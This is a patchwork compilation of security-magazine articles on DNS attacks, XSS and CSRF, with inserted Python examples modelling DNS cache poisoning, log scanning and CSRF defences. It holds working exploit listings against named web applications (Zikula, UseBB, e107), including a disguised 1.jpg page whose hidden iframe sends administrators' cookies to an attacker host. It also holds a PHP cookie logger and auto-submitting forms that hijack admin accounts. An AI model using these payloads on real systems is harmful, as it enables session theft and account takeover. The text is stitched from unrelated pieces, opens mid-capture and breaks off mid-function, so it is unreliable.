15:33:50.343398 IP (tos 0x0, ttl 126, id 27937, offset 0, flags [DF], proto UDP (17), length 118) dns.company.com.domain > ws003.local.42090: [udp sum ok] 0 NXDomain q: A? e0qysndm.example.rs. 0/1/0 ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102 10800 3600 2419200 10800 (90)

Note the ICMP port unreachable in the capture: Scapy sends from a raw socket, so the querying host has no UDP socket bound on port 10385 and its kernel rejects the reply. For a flood this does not matter, but every answer the server sends back costs the sending host an ICMP error as well.

Recursive Request Flooding
This attack consists of an attacker flooding a target name server with DNS requests for records for which the server is not authoritative. This action has two effects: one is flooding the target name server with recursive DNS requests, and the other is to attack the responsible authoritative name server with a DNS request flood.

Exploiting the DNS Trust Model – Domain Hijacking
This form of attack could also be called a DNS Registration Attack. To take ownership of a domain it is necessary to register at the appropriate Internet registrar, provide the domain contact information, and ensure that the Generic Top Level Domain servers (gTLDs) are updated with the appropriate name server information. It is possible to fake the DNS registration or to change registration details. If the attack is successful and the DNS registration records are updated, the attacker can set up a "rogue" DNS server and direct clients to fake web sites and mail servers. This attack is preferable for "phishers" because the user is unaware of the fraud. DNS registration bodies have introduced several protection controls to authenticate registration requests and avoid domain hijacking:
• Comparison of the e-mail addresses in the mail header and in the Mail-From field is one example.
• An encrypted contact-supplied password stored in the database for authentication of registration requests is another.
• The use of PGP keys for signing registration modification requests.

Cache Poisoning
Figure 3. DNS Cache poisoning
Very often DNS servers are configured to search for records in their cache as the primary source and then to search the zone file data.
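The header fields listed above and the transaction-ID race that the cache-poisoning section describes, as an added example that is not part of the original article: a pure-Python DNS message builder exposing ID, QR, RD, RA, RCODE and the four count fields, a toy caching resolver that accepts a reply only when its ID, destination port and question match an outstanding query, and an attacker loop that floods guessed replies. The names, addresses, ports, sequential-ID policy and the number of guesses are constructed assumptions.

```python
"""DNS header fields and the transaction-ID race, modelled in pure Python (added example)."""
import random
import struct

RCODE_NAMES = {0: "no-error", 1: "format-error", 2: "server-failure",
               3: "name-error", 4: "not-implemented", 5: "refused"}


def encode_name(name):
    """RFC 1035 labels: 2dat.example.rs -> 04 '2dat' 07 'example' 02 'rs' 00 (no compression)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_header(ident, qr=0, rd=1, ra=0, rcode=0, qdcount=1, ancount=0, nscount=0, arcount=0):
    """12-byte header; OPCODE=QUERY and AA/TC/Z are left at 0, as in Listing 1."""
    flags = (qr << 15) | (rd << 8) | (ra << 7) | (rcode & 0xF)
    return struct.pack("!HHHHHH", ident, flags, qdcount, ancount, nscount, arcount)


def parse_header(msg):
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": ident, "qr": flags >> 15, "rd": (flags >> 8) & 1, "ra": (flags >> 7) & 1,
            "rcode": RCODE_NAMES.get(flags & 0xF, flags & 0xF),
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def question(qname):
    return encode_name(qname) + struct.pack("!HH", 1, 1)          # QTYPE=A, QCLASS=IN


def build_query(ident, qname):
    """A recursive A query: QDCOUNT=1, ANCOUNT=0, the shape the Scapy script sends."""
    return build_header(ident) + question(qname)


def build_a_answer(ident, qname, ip, ttl):
    """A (possibly forged) answer: QR=1, one A record with the sender's choice of TTL."""
    rr = encode_name(qname) + struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(int(o) for o in ip.split("."))
    return build_header(ident, qr=1, ra=1, ancount=1) + question(qname) + rr


class Resolver:
    """Toy caching resolver.  predictable=True mimics sequential IDs and a fixed source
    port (the case the article calls predictable); otherwise both come from rng."""

    def __init__(self, predictable, rng):
        self.predictable, self.rng = predictable, rng
        self.next_id, self.fixed_port = 0x1000, 33000      # assumed starting values
        self.pending = {}       # (id, port) -> qname of an outstanding query
        self.cache = {}         # qname -> (ip, ttl)

    def send_query(self, qname):
        if self.predictable:
            ident, port = self.next_id, self.fixed_port
            self.next_id = (self.next_id + 1) & 0xFFFF
        else:
            ident, port = self.rng.randrange(1 << 16), self.rng.randrange(1024, 1 << 16)
        self.pending[(ident, port)] = qname
        return build_query(ident, qname), port

    def receive(self, msg, port):
        """The first reply whose ID, port and question match wins; anything later is dropped."""
        h = parse_header(msg)
        qname = self.pending.get((h["id"], port))
        if qname is None or h["qr"] != 1 or h["ancount"] < 1:
            return False
        q = question(qname)
        if msg[12:12 + len(q)] != q:
            return False
        n, rr = len(encode_name(qname)), msg[12 + len(q):]
        ttl, rdlen = struct.unpack("!IH", rr[n + 4:n + 10])
        self.cache[qname] = (".".join(str(b) for b in rr[n + 10:n + 10 + rdlen]), ttl)
        del self.pending[(h["id"], port)]
        return True


def poison(resolver, observed_id, observed_port, qname, fake_ip, guesses):
    """Attacker: having seen one earlier query (ID and source port) leak from the
    resolver, flood guessed replies at the next lookup before the real answer arrives."""
    resolver.send_query(qname)                      # the victim's own lookup goes out here
    for k in range(guesses):
        guess_id = (observed_id + 1 + k) & 0xFFFF    # sequential IDs make this the right guess
        forged = build_a_answer(guess_id, qname, fake_ip, ttl=86400)   # long TTL, as the text says
        if resolver.receive(forged, observed_port):  # a fixed port is known; a random one is stale
            return True
    return False


def demo(predictable, guesses=16, seed=7):
    """Run the race once; returns (hit, cached record for answer.com or None)."""
    r = Resolver(predictable, random.Random(seed))
    probe, probe_port = r.send_query("probe.attacker.example")   # attacker-triggered, observed
    hit = poison(r, parse_header(probe)["id"], probe_port, "answer.com", "203.0.113.66", guesses)
    return hit, r.cache.get("answer.com")


if __name__ == "__main__":
    print("sequential IDs, fixed port:", demo(True))
    print("random IDs, random port:   ", demo(False))
```

Against sequential IDs on a fixed port the first guess lands and the forged record sits in the cache for its full TTL; with 16 bits of ID and 16 bits of port entropy the same 16 guesses have no realistic chance, which is the whole argument for source-port randomisation on top of random IDs.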
From an attacker's perspective it is easier to compromise the cache on a name server than to manipulate zones. A cache poisoning attack can be combined with a DNS spoofing attack: by spoofing a counterfeit response to a DNS query, an attacker can remotely update server cache data. When a high TTL (Time To Live) value is returned by the attacker along with the spoofed record data, the response data will be cached by the local name server for a considerable period of time. This will have an impact on all clients in the same network. The goal of a cache poisoning attack is to feed the name server false address (A) or name server (NS) records with a high TTL value.

What makes DNS cache poisoning a difficult (or easy) exploit is the use of a 16-bit Transaction ID, an integer that is sent with every DNS query. This integer is supposed to be randomly generated. If the transaction ID integers used by the company's DNS are predictable, the attacker has a better chance to fake the requested IP address.

In the diagram below the attacker will try to poison the cache of the Company DNS server for the domain answer.com. In the first step of the attack, the attacker contacts the company's DNS server to check for the domain name answer.com with the command:

root@bt# dig answer.com @comapnie.com

In the case that there wasn't a recent request for answer.com at the company's DNS server, it will make a DNS query to the root name server to look up the IP address for answer.com. This query contains the random Transaction ID integer. At the same time, the attacker starts an attack which floods the company's DNS server with manually crafted packets that look like the DNS reply expected but contain the wrong IP address. Each reply will have a different transaction ID integer; the attacker expects that one of these fake replies will match the transaction ID in the query sent by the company's DNS. It is important that the replies by the attacker reach the company's DNS server before the legitimate replies. The company's DNS will use the first reply which appears legitimate (by checking the transaction ID integer) and place the fake IP address in its cache. What can make this attack even more efficient is to start a DDoS against the authoritative DNS server for www.answer.com; this will increase the chance that the attacker predicts the transaction ID integer before the real answer arrives (Figure 3).

DNS Hijacking
In this kind of attack the attacker tries to "hijack" part of the DNS name space by compromising an upstream server or by submitting a fake name server registration change to the Internet registrar. An attacker can compromise a server which contains the records for answer.com, or submit a fake request for a change to the Internet registrar, and become able to change records for answer.com. After this step the attacker can hijack the domain answer.com and redirect clients addressed to the legitimate answer.com to fake servers which can run different services (mail, http, https). This type of attack has a key benefit in that it does not require the direct compromise of any servers on the target organization's network. If the attacker's intention, for example, is to deface the corporate Web page for the victimco.com domain, to affect client and server redirection, or Internet denial-of-service, the attacker can effectively achieve this by leveraging a DNS hijacking attack to redirect Internet Web clients to a new site containing a revised set of Web content (Figure 4).

Figure 4. DNS Hijacking

ALEKSANDAR BRATIC
CISO at a respectable financial institution in Serbia, focused on pen testing techniques and methodology, vulnerability assessment, incident handling process and risk mitigation.

XSS Using Shell of the Future
Cross-site scripting (XSS) vulnerabilities in an application potentially allow an attacker to execute malicious script on other users' systems and hence compromise their sessions, authentication credentials, or even conduct other malicious activity. This can occur if HTML or script can be written to an application data store and be retrieved by other users, or if an attacker can coerce a victim into clicking on a malicious link.

In a penetration test, XSS issues are typically demonstrated with a script function that is short, simple, and visual: the alert box. Many XSS examples use alert(1) or alert(/XSS/) as a payload, but this fails to show the power of an XSS vulnerability and may lead to a "so what?" reaction from developers not familiar with such a vulnerability. In this article, the author will show you how to exploit an XSS vulnerability (e.g. session hijacking) using Shell of the Future.

Shell of the Future – XSS Exploitation Tool
Shell of the Future is a Reverse Web Shell handler. It can be used to hijack sessions where JavaScript can be injected using XSS or through the browser's address

Figure 1. Architecture of Shell of the Future (Source: http://www.andlabs.org/tools/sotf/sotf.html)
Cross-Site Request Forgery
OWASP currently define Cross-Site Request Forgery as "an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated." [1] It is sometimes abbreviated as CSRF or XSRF, depending on who is writing about it.

Why is it an issue? Firstly, many people have many different web sites open at any one time, for example Facebook and Gmail; if these didn't implement proper protections then an attacker could cause email or comments to be posted as a particular user. In other words, if a user is logged into a web application and views another web page, the second page can cause the user's browser to initiate actions on the web application without the user being aware of what is happening. This vulnerability exists because the browser will automatically transmit the authentication or session cookie to the application with each request to that site, and the application does not always check whether a request came from a user click or whether it merely got invoked because of an img src="" tag embedded in another page.

The worst-case scenario is a naive implementation of a banking website which would transfer funds when the user is logged in by the use of a script with several GET parameters:

http://www.example.com/transfer_funds.php?to_account=12345678&to_sort=123456&amount=1000

Now as an attacker, all I have to do is insert

<img src="http://www.example.com/transfer_funds.php?to_account=12345678&to_sort=123456&amount=1000" width=1 height=1>

into a popular webpage and then the donations should start coming my way soon. If anyone who is logged into that bank views my web page, their browser will make a request to the bank that is indistinguishable by the bank from the user making that same request themselves. In this case the vulnerability can be mitigated by checking Referer headers; however, this check can be circumvented if there are Cross-Site Scripting problems present in the same site.

As a more concrete example, CSRF was used to great effect by PDP Architect/Gnu Citizen in a series of attacks against particular makes of home router [2]. Below is the example they give for changing the password:

POST /cgi/b/ras/?ce=1&be=0&l0=-1&l1=-1 HTTP/1.1
0=31&1=&30=PASSW0RD

Since we know the IP address defaults to 192.168.1.1, we can construct some JavaScript to issue such a POST request when this web page is viewed (Listing 1). It should cause a POST request of the above form to the given URL. (This isn't great JavaScript, I know, but it is functional and will serve for a proof of concept.) This page can be hosted on a local Apache server and visited in a web browser.

Practical exploitation of post-authentication vulnerabilities in web applications
These days many people do not consider post-authentication vulnerabilities dangerous, as long as they impact webpages which do not remain available to unauthenticated users. This situation is probably aggravated by some misinformation websites and some self-proclaimed security experts, which try to deny disclosed vulnerabilities by posing them as a feature implemented by design. The problem is that they simply do not understand the exploitation vectors of these vulnerabilities and they consider them benign.

In the past year, High-Tech Bridge SA Security Research Lab has been performing vendor awareness on a non-profit basis, explaining that post-authentication vulnerabilities are dangerous and should be fixed. This case-by-case approach is paying off, as shown by the vendors' patch statistics for our Security Advisories:
• Only 32% of post-authenticated vulnerabilities were fixed during the first and second quarter of 2011.
• 65% were fixed during the third and fourth quarter of 2011.

The goal of this article is to demonstrate the real danger of post-authenticated vulnerabilities, which remain a highly underestimated attack vector in the security scene. We will not explain the basics of web application attacks in this article, as that has already been done many times before by others. We will focus on a practical way to exploit post-authentication XSS and CSRF.

Post-authentication XSS
One of the most popular post-authentication vulnerabilities is XSS (Cross Site Scripting), such as Stored XSS in the administrator's portion of a web application. This type of vulnerability is a perfect attack against web-site administrators, not against common users. However, our Research Lab assigns a medium risk level (for a standard XSS) to these vulnerabilities, despite the limited exploitation vector (against website administrators only), for the simple reason that the most efficient exploitation vector of XSS is carried out against website administrators.

Testing the Proof of Concept
Let's start with something very simple. For our example we will take an old version of Zikula, which is vulnerable to XSS against the website administrator (details are described in our Security Advisory HTB23039, which was publicly disclosed on High-Tech Bridge's website). Several months ago the vulnerability was rapidly patched by the vendor, and today we are going to demonstrate the full version of the exploit. Our vulnerable website with Zikula is located at http://targethost/.

First of all let's test the Proof of Concept (PoC) code from the advisory to make sure that the vulnerability exists. We log into Zikula as an administrator and test by using the proof of concept:

http://targethost/index.php?module=theme&type=admin&func=setasdefault&themename=<script>document.location.href='http://hackhost/c.php?c='%2Bescape(document.cookie)</script>

Figure 1. XSS works perfectly

Indeed, we see the value of our cookie. Now let's see how this vulnerability may be exploited in practice. Let's imagine that a malicious hacker has a website located at http://hackhost/. Next we have to make the logged-in administrator visit our hackhost website to steal his cookies. Here we will not write a complex scenario, as there are already plenty of social engineering attack examples on the Internet; we will use a very basic one, as if a website user (the malicious hacker in reality) wants to wish a happy birthday to the administrator. The administrator receives a Birthday Card, which is located at http://hackhost/1.jpg. This will make the malicious link that we are going to send to the administrator less suspicious. Indeed, the JPG extension will not seem suspicious to the majority of users.

Listing 1. Content of web root of hackhost
root@hackserver:/var/www/hackhost# ls -la
drwxrwxrwx  2 root root   4096 2012-01-01 00:00 .
drwxrwxrwx 17 root root   4096 2012-01-01 00:00 ..
-rw-rw-rw-  1 root root     37 2012-01-01 00:00 .htaccess
-rw-rw-rw-  1 root root    288 2012-01-01 00:00 1.jpg
-rw-rw-rw-  1 root root 277694 2012-01-01 00:00 1.jpeg
-rw-rw-rw-  1 root root     78 2012-01-01 00:00 c.php
root@hackserver:/var/www/hackhost# cat .htaccess
AddType application/x-httpd-php .jpg
root@hackserver:/var/www/hackhost# cat 1.jpg
<html>
<body>
<img src="1.jpeg">
<iframe width="1" height="1" style="display:none" src="http://targethost/index.php?module=theme&type=admin&func=setasdefault&themename=<script>document.location.href='http://hackhost/c.php?c='%2Bescape(document.cookie)</script>">
</body>
</html>
root@hackserver:/var/www/hackhost# cat c.php
<?
$f=fopen("log.txt", "a");
fwrite($f, $_GET["c"]."\r\n");
fclose($f);
?>

We have the following files:
• The .htaccess file causes Apache to handle JPG files as PHP scripts.
• 1.jpeg is a normal JPG file which is used as a simple birthday card picture.
• 1.jpg shows the 1.jpeg picture to simulate simple image behavior. However, an invisible part in the victim's browser will create an iframe, which will exploit the XSS vulnerability inside the admin panel.
• The c.php script simply writes the received administrator's cookie to the log.txt file.

On the image below we see what the administrator will see after opening the link in his browser:

Figure 2. Image displayed in browser

As soon as the logged-in administrator sees this image, his admin account is compromised. Perfect, we now have the administrator's cookie:

_zsid2=655085aceec73b6e3aacb230a344bc88f169c20d

Let's go back to the vulnerable http://targethost/. We have not logged into the system, so we do not have any rights:

Figure 3. Lack of access

Figure 4. Modifying admin cookie

Client side attack through CSRF
Another example of a post-authenticated vulnerability is CSRF or XSRF (Cross Site Request Forgery). Let's take the example of the CSRF vulnerability which was discovered in a previous version of UseBB (vulnerability details are described in our HTB22913 Security Advisory), which was also patched by the vendor several months ago. Here is what the exploited UseBB administrator will see when the link is opened (Figure 6); as soon as the administrator opens the link, his profile is modified.
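Before moving on to the CSRF case, the detection side of the Zikula link shown above, as an added example that is not part of the article: a scanner over Apache combined-format access log lines that decodes the request URL and flags what the birthday-card exploit leaves behind, a script payload in an admin-function query and an admin request whose Referer is on another host. The three log lines are constructed to mirror the themename payload; the admin markers, field layout and host names are assumptions for the demonstration, not Zikula's own.

```python
"""Flag admin-panel XSS exploitation attempts in Apache combined logs (added example)."""
import re
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

ADMIN_MARKERS = ("type=admin", "/admin")            # assumed: how admin requests look in this app
PAYLOAD_MARKERS = ("<script", "document.cookie", "javascript:", "onerror=", "onload=")

# Constructed sample: a normal admin page view, the exploited link (note the hackhost
# Referer), and a reflected-XSS probe against a non-admin page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:14:58 +0000] "GET /index.php?module=theme&type=admin&func=view HTTP/1.1" 200 8412 "http://targethost/index.php?module=admin" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2012:10:15:02 +0000] "GET /index.php?module=theme&type=admin&func=setasdefault&themename=%3Cscript%3Edocument.location.href%3D%27http%3A%2F%2Fhackhost%2Fc.php%3Fc%3D%27%2Bescape%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 5123 "http://hackhost/1.jpg" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2012:10:16:40 +0000] "GET /index.php?module=theme&name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 2210 "-" "curl/7.21"
"""


def decode_fully(s, rounds=3):
    """Attackers double-encode; decode until the string stops changing (bounded)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def analyse(line, own_host="targethost"):
    """Return {'ip', 'time', 'reasons'} for a parsable line, or None.  Empty reasons = benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = decode_fully(m["url"]).lower()
    is_admin = any(marker in url for marker in ADMIN_MARKERS)
    referer = m["referer"]
    ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
    reasons = []
    if any(p in url for p in PAYLOAD_MARKERS):
        reasons.append("script-payload-in-url")
    if is_admin and ref_host and ref_host != own_host:
        reasons.append("admin-request-referred-from:" + ref_host)
    if reasons and is_admin:
        reasons.append("targets-admin-function")     # the post-authentication case the article describes
    return {"ip": m["ip"], "time": m["ts"], "reasons": reasons}


def scan(log_text, own_host="targethost"):
    """Only the flagged entries, in log order."""
    hits = []
    for line in log_text.splitlines():
        r = analyse(line, own_host)
        if r and r["reasons"]:
            hits.append(r)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], ", ".join(hit["reasons"]))
```

The foreign Referer on an admin request is the cheapest signal here: the themename payload itself could be obfuscated further, but the administrator's browser still arrives from the page that carried the hidden iframe.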
Now, let's modify our admin cookie using the FireCookie plug-in for Firebug in Firefox and use the intercepted Session ID of the administrator (Figure 4). Refresh the page with the new cookie enabled:

Figure 5. Gain Access

Perfect. We are now logged in as the Zikula administrator with full rights. Let's come back to our hackhost and have a look at what we received:

root@hackserver:/var/www/hackhost# cat log.txt

This is a very simple example, but it is a very common exploitation attempt for post-authentication XSS vulnerabilities.

As previously mentioned, CSRF is quite often wrongly considered benign by unaware people. Our target will again be located at http://targethost/ with the vulnerable version 1.0.11 of UseBB. To exploit this vulnerability, we have to make a logged-in UseBB administrator visit our malicious image located at http://hackhost/1.jpg, which is coming from a forum member. Again, we will need a slightly modified version of our http://hackhost/ used in the previous XSS case. We can see a new file named form.html designed to perform CSRF exploitation (Listing 2).

Listing 2. Files and their content in hackhost's web root
root@hackserver:/var/www/hackhost# ls -la
drwxrwxrwx 2 root root  4096 2012-01-01 00:00 .
drwxrwxrwx 8 root root  4096 2012-01-01 00:00 ..
-rw-rw-rw- 1 root root    38 2012-01-01 00:00 .htaccess
-rw-rw-rw- 1 root root   118 2012-01-01 00:00 1.jpg
-rw-rw-rw- 1 root root 50935 2012-01-01 00:00 1.jpeg
-rw-rw-rw- 1 root root  1109 2012-01-01 00:00 form.html
root@hackserver:/var/www/hackhost# cat .htaccess
AddType application/x-httpd-php .jpg
root@hackserver:/var/www/hackhost# cat 1.jpg
<html>
<body>
<img src=1.jpeg>
<iframe width="1" height="1" style="display:none" src="form.html">
</body>
</html>
root@hackserver:/var/www/hackhost# cat form.html
<html>
<body>
<form action="http://targethost/panel.php?act=editprofile" method="post" name="main" id="main">
<input type="hidden" name="displayed_name" value="admin">
<input type="hidden" name="real_name" value="">
<input type="hidden" name="avatar_remote" value="">
<input type="hidden" name="birthday_day" value="">
<input type="hidden" name="birthday_month" value="">
<input type="hidden" name="birthday_year" value="">
<input type="hidden" name="location" value="">
<input type="hidden" name="website" value="">
<input type="hidden" name="occupation" value="">
<input type="hidden" name="interests" value="">
<input type="hidden" name="signature" value="">
<input type="hidden" name="msnm" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="email" value="hacker@hack.host">
<input type="hidden" name="yahoom" value="">
<input type="hidden" name="jabber" value="">
<input type="hidden" name="skype" value="">
<input type="submit" value="OK">
</form>
<script>
document.main.submit();
</script>
</body>
</html>

However, there is nothing here which really looks suspicious – this is simply a birthday card. As soon as the administrator opens the link, his profile's email will be changed to hacker@hack.host by our form.html, as if it was the real administrator who legitimately changed his email address by using the designed function of UseBB:

Figure 6. Suspicious Happy Birthday
Figure 7. Getting new password

Now we simply need to use the UseBB password recovery feature to get a new administrator password sent to the hacker@hack.host email:

Figure 8. Receiving the administrator's password

After receiving the administrator's password by email, we can log in as the UseBB administrator:

Figure 9. Logging as UseBB administrator

This is a very simple example of CSRF, but it is a quite efficient proof of concept and the reason why this vulnerability was reported to the vendor, who in turn agreed that it was a serious issue by providing a new release to his customers.

When CSRF combines with XSS
Now, let's have a look at a more complex exploit using a hybrid approach, which relies on both XSS and CSRF. In this example we will use the CSRF and stored XSS vulnerabilities in the admin panel of e107; these vulnerabilities have also been fixed by the vendor. We will again consider that the vulnerable version of e107 is located at http://targethost/ and that the hacker's server is located at http://hackhost/.

One of the scripts (users_extended.php) in the e107 administrator panel is vulnerable to stored XSS: one of the script parameters, named user_include, is vulnerable to Stored XSS (Persistent XSS), as well as to CSRF attacks. Details are described in our Security Advisory HTB23004. The vulnerable script allows the website administrator to create a custom field for user profiles. The complexity is that the vulnerable field is edited and displayed on two different pages.

Usually, vendors do not implement CSRF protection in their administration scripts because they may consider it useless, as the vulnerable code does not perform any critical or sensitive actions such as the password change that we used in our previous CSRF example. Sometimes it may be true and sometimes not. In the same way, a simple XSS in the script without the CSRF would be pretty useless from an attacker's point of view. This inaccurately makes some people believe that such a vulnerability is not dangerous at all. In this case, as in many other High-Tech Bridge advisories, the script would not represent a big value for hackers if it was only vulnerable to CSRF; in the present case, however, we have a perfect combination of XSS and CSRF together. If developers miss an XSS somewhere, then they are faced with a cocktail, XSS and CSRF, which may open a door to full system compromise. So let's start exploiting it.

As before, we will need a slightly modified version of our http://hackhost/, the content of which will be similar to our previous examples with classic post-authenticated XSS and CSRF. In this case 1.jpg is a little bit more complex and performs 3 different actions:
• It shows a legitimate Happy Birthday image (1.jpeg).
• An invisible iframe is included with form.html, which exploits the CSRF vulnerability and adds a new field with malicious JavaScript code inside that steals the user's cookie (this is possible because our script is vulnerable to XSS).
• Two seconds after loading form.html, 1.jpg will request the users_extended.php script with the stored XSS attack code (inserted in step 2).

Listing 3. Content of hackhost's web root
root@hackserver:/var/www/hackhost# ls -la
total 80
drwxrwxrwx  2 root root  4096 2012-01-01 00:00 .
drwxrwxrwx 11 root root  4096 2012-01-01 00:00 ..
-rw-rw-rw-  1 root root    38 2012-01-01 00:00 .htaccess
-rw-rw-rw-  1 root root   259 2012-01-01 00:00 1.jpg
-rw-rw-rw-  1 root root 50935 2012-01-01 00:00 1.jpeg
-rw-rw-rw-  1 root root    78 2012-01-01 00:00 c.php
-rw-rw-rw-  1 root root   846 2012-01-01 00:00 form.html
root@hackserver:/var/www/hackhost# cat .htaccess
AddType application/x-httpd-php .jpg
root@hackserver:/var/www/hackhost# cat 1.jpg
<html>
<body>
<img src=1.jpeg>
<iframe width="1" height="1" style="display:none" id=f1 src='form.html'></iframe>
<script>
setTimeout("document.getElementById('f1').src='http://targethost/e107_admin/users_extended.php'",2000);
</script>
</body>
</html>
root@hackserver:/var/www/hackhost# cat c.php
<?
$f=fopen("log.txt", "a");
fwrite($f, $_GET["c"]."\r\n");
fclose($f);
?>
root@hackserver:/var/www/hackhost# cat form.html
<form method="POST" action="http://targethost/e107_admin/users_extended.php?editext" name=m>
<input type="hidden" name="user_field" value="abcde1f1">
<input type="hidden" name="user_text" value="12121">
<input type="hidden" name="user_type" value="1">
<input type="hidden" name="user_include" value=""><script>document.location.href='http://hackhost/c.php?c='+escape(document.cookie);</script>">
<input type="hidden" name="user_parent" value="0">
<input type="hidden" name="user_required" value="0">
<input type="hidden" name="user_applicable" value="255">
<input type="hidden" name="user_read" value="0">
<input type="hidden" name="user_write" value="253">
<input type="hidden" name="user_hide" value="0">
<input type="hidden" name="add_field" value="1">
<input type=submit>
</form>
<script>
document.m.submit();
</script>

Here is our malicious link that a logged-in e107 administrator would open: http://hackhost/1.jpg. As we have already seen in the XSS example, the administrator will not see any suspicious activity, except the Birthday Card:

Figure 10. Dangerous Birthday Card

As before, both XSS and CSRF vulnerabilities were successfully exploited. The e107 administrator's cookie will be passed to c.php, which will store it in the log.txt file:

Listing 4. XSS example
root@hackserver:/var/www/hackhost# cat log.txt
PHPSESSID=a688a485f2ddb7a5ce40610e58d686ce; e107cookie=1.f1f19cd495328ce023bed1c0d5108d2a; e107_tzOffset=-240; e107_tdOffset=-8; e107_tdSetTime=1325883584

Now we can simply edit the cookie and refresh the page, and you have exploited the administrator's page:

Figure 11. Exploiting the administrator's page

We are now logged in as the e107 admin. We now have access to all of the administrative functions and unlimited control of e107. Moreover, the administrator will not see any suspicious activity.

Figure 12. Unlimited access

Conclusion
The three client-side attacks described in this article show that post-authenticated vulnerabilities are also dangerous, despite the fact that they do not impact webpages available to non-authenticated users. They are far from being implemented by application design and may become an entry point into your system. We hope that this article will improve vendor and user awareness regarding the real dangers of post-authentication vulnerabilities through client-side attack vectors. We would also like to highlight the efforts of Secunia, who do a lot to educate vendors and users about post-authentication vulnerabilities. However, such vulnerabilities do remain a target of choice in the real world, despite being highly underestimated on certain security websites and during most penetration tests.

MARSEL NIZAMUTDINOV
Marsel Nizamutdinov, web application security expert, Head of Research & Development Department at High-Tech Bridge SA, author of "Hacker Web Exploitation Uncovered" (2005).

Discovering Modern CSRF Patch Failures
Cross-site request forgery (CSRF/XSRF) vulnerabilities allow an attacker to perform authenticated actions without authenticating as the user. This is possible by chaining other exploits like cross-site scripting (XSS), or simply abusing any form of valid injection point. These vulnerabilities are easy to locate and perform attacks against, whilst allowing an attacker to completely compromise an account and/or compromise the host. Read further for theoretical and real-world exploits on how this behavior can be abused.

In particular, the issues stem from how the browser handles same origins and authority. The issue revolves around general browser architecture and its handling of the web origin policy [1]. Some of the issues cannot be fixed in browsers, as the real problem is how web applications handle actions. The focus of this article will be around the PHP language, but CSRF issues exist throughout other languages.

The problem is seen when the browser has stored authentication data for the victimsite.com domain/origin: data such as credential cookies, session cookies, basic/digest authorization depending on attack vector [8], and possibly other stored authentication data the browser manages. This data is used when another domain makes a request for external resources like images, videos, scripts, etc. Here's how HTML would be used to grab an image from victimsite.com's origin and load it in attacksite.com:

<img src="http://victimsite.com/img.jpg" />

When the user's browser visits attacksite.com and sees this image tag, it will grab this resource by making the appropriate request for the client. Assume the user is logged in with an authenticated=yes cookie. A stripped down request for this image is:

GET /img.jpg HTTP/1.1
Host: victimsite.com
Cookie: authenticated=yes

The authenticated cookie for victimsite is added by the browser when making the request for victimsite.com/img.jpg. This allows us to perform authenticated actions without ever having to authenticate ourselves.

+Remote Vector
The easiest way to exploit this issue is with cross-origin communication, as seen with the previous section's attacksite.com and victimsite.com image scenario. Think about forums or blogs where you have the ability to upload avatars from a supplied URL or use bbcode (bulletin board code, a markup language for forums) [11] to display images or movies in comments. Please re-read that section if you do not understand how a remote vector (different origin) would work.

+Local Vector
While the name does say cross-site, the vulnerability can be exploited in the context of the same origin and never require access to resources from another origin, which will be covered more later.
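The forged request end to end, as an added example that is not code from any of the articles above or from UseBB, Zikula or e107: it serves the bank-transfer image tag in the Cross-Site Request Forgery article, the auto-submitted form.html in the UseBB case, and the cookie-attachment behaviour just described. The browser half applies the SameSite cookie rules, a defence that post-dates these articles, to decide whether the session cookie travels with a request started from another origin; the server half is a framework-free profile-edit handler, first as the vulnerable applications accept it (cookie only) and then with a per-session synchronizer token plus an Origin/Referer check. Hosts, paths, session ids and form fields are constructed for the demonstration.

```python
"""CSRF end to end: what the browser attaches and what the server should check (added example)."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE = "http://targethost"        # assumed origin of the protected application
SESSIONS = {}                     # session id -> {"user": ..., "csrf": token}


def site_of(url):
    """scheme://host.  Real browsers compare registrable domains; the host is enough here."""
    u = urlsplit(url)
    return f"{u.scheme}://{u.hostname}"


def cookies_to_send(jar, target_url, initiator_url, top_level, method):
    """Browser side.  jar maps name -> (value, samesite).  A cross-site request gets a
    cookie only if it is SameSite=None, or SameSite=Lax on a top-level GET/HEAD
    navigation; Strict cookies never leave their own site.  Sub-resource loads such
    as <img> and a form posted from a hidden iframe are never top-level."""
    same_site = site_of(target_url) == site_of(initiator_url)
    sent = {}
    for name, (value, samesite) in jar.items():
        lax_ok = samesite == "Lax" and top_level and method in ("GET", "HEAD")
        if same_site or samesite == "None" or lax_ok:
            sent[name] = value
    return sent


def new_session(user):
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(16)}
    return sid


def edit_profile_vulnerable(method, cookies, form, headers, profile):
    """The behaviour the articles exploit: the session cookie is the only check."""
    sess = SESSIONS.get(cookies.get("sid"))
    if method != "POST" or sess is None:
        return 403
    profile["email"] = form["email"]
    return 200


def request_from_own_site(headers):
    """Origin if present, else Referer; a missing header counts as cross-site (fail closed)."""
    src = headers.get("Origin") or headers.get("Referer")
    return bool(src) and site_of(src) == SITE


def edit_profile_hardened(method, cookies, form, headers, profile):
    sess = SESSIONS.get(cookies.get("sid"))
    if method != "POST" or sess is None:
        return 403
    if not hmac.compare_digest(form.get("csrf_token", ""), sess["csrf"]):
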